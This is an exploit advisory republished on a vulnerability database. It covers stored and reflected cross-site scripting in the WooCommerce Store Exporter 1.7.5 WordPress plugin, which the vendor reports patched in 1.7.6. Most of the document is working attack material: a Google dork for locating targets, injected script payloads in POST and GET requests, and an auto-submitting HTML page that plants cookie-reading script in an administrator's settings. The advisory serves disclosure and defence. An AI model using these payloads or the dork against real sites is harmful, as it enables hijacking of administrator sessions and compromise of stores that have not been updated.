Vulners
Lucene search
WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities
# Exploit Title: WooCommerce Store Exporter v1.7.5 Stored XSS
# Google Dork: inurl:"woocommerce-exporter"
# Date: 26/08/2014
# Exploit Author: Mike Manzotti @ Dionach
# Vendor Homepage: http://www.visser.com.au/plugins/store-exporter/
# Software Link: http://downloads.wordpress.org/plugin/woocommerce-exporter.zip (Fixed)
# Version: v1.7.5
# Vulnerability Disclosure Timeline:
2014-08-25: Discovered vulnerability
2014-08-25: Vendor Notification
2014-08-25: Vendor Response/Feedback
2014-08-26: Vendor Fix/Patch (v 1.7.6)
2014-08-26: Public Disclosure
Stored Cross Site Scripting
URL
FIELDS
/wp-admin/admin.php?page=woo_ce&tab=export
POST: export_filename
POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings
export_filename="</script><script>alert(document.cookie)</script>&delete_file=0&encoding=UTF-8&timeout=0&delimiter=%2C&category_separator=%7C&bom=1&escape_formatting=all&enable_auto=0&auto_type=products&order_filter_status=&auto_method=archive&enable_cron=0&submit=Save+Changes&action=save-settings
Response:
<input name="export_filename" type="text" id="export_filename" value="\"</script><script>alert(document.cookie)</script>"
[cid:[email protected]]
Scenario:
An attacker creates a malicious page as shown below and uploads it on a server under attacker's control.
<html>
<head>
<title>XSS WooCommerce - Store Exporter</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="1" action="http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings">
<input type="hidden" name="export_filename" value='"</script><script>alert(document.cookie)</script>"'/>
<input type="hidden" name="action" value="save-settings"/>
</form>
</body>
</html>
When a WordPress administrator visits the malicious page above, a JavaScript code which prompts administrator's cookies will be saved on the victim's website. The attacker could send the URL pointing to the malicious webpage in an email or posting it in a review of a WooCommerce product, as shown below:
[cid:[email protected]]
When the WordPress administrator clicks on the malicious URL...
[cid:[email protected]]
The JavaScript code will be executed and saved in Store Exporter Settings:
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings
[cid:[email protected]]
Reflected Cross Site Scripting
URL
FIELDS
/wp-admin/admin.php?page=woo_ce&tab=export
GET: tab, POST: dataset
1) Example
Request:
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(1)</script<http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(1)%3c/script>>
Response:
[...]
<code>tabs-export<script>alert(1)</script>c172f.php</code>
[...]
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(document.cookie)</script<http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(document.cookie)%3c/script>>
[cid:[email protected]]
http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings
2) Example
Request:
POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=export
dataset=users1be3c<script>alert(1)<%2fscript>87acc&product_fields_order%5Bparent_id%5D=&product_fields_order%5Bparent_sku%5D=&product_fields_order%5Bproduct_id%5D=&product_fields_order%5Bsku%5D=&product_field
Response:
[...]
<h3>Export Details: export_users1be3c<script>alert(1)</script>
[...]
Scenario:
Similar scenarios could be reproduced as shown in the Stored Cross-site Scripting scenario.
Kind regards,
Mike
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Aug 2014 00:00Current
7.1High risk
Vulners AI Score7.1